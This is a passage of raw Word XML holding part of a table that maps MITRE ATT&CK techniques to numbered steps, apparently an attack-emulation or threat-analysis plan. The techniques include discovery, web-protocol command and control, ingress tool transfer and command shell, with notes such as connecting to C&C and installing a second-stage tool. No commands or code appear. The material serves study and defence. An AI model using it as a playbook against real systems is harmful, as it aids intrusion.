          <w:p w14:paraId="690EC06A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F8814A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="2CAE989E" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B4A3089" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4834DEB9" w14:textId="26EDA391" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00F11AE8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F5128B7" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1069.001 Permission Groups Discovery: Local Groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5793AF39" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B60721" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3C6CA1" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12204F0F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C859B95" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="19FE5533" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4121B80B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459E653F" w14:textId="05A8AED2" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00F11AE8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689F0743" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1049 System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37E68C54" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22A23714" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4427B576" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42693660" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5957D7CA" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="09638F8D" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D173FD2" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF84145" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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41ECAFB6" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>071</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">.001 Application Layer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301DA313" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C05CE17" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05C03F6C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B4DB779" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F84815D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This technique to provide more detail on step below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="0E95CAB1" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B86C1A1" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBF1A2E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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3D5BFE46" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D3699AD" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B237F3" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A191E4D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00AC2C39" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68292C4F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial installation connects to C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="1643BB63" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="238DA73E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C55BF2E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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50941064" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B45AD82" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B1E449F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="733B4CEB" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4502C650" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="167EB71E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Install </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>second stage tool (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Bubblewrap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00B857D7" w14:paraId="560B0831" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F78955D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1006E6CE"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73D13464" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BD3CC13" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4748D689" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="505B133F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
